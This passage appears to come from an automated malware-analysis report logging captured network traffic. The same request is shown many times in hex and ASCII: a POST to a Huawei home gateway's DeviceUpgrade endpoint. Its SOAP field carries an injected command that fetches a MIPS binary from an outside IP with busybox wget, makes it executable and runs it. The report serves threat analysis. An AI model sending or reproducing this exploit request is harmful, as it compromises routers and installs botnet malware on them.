3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 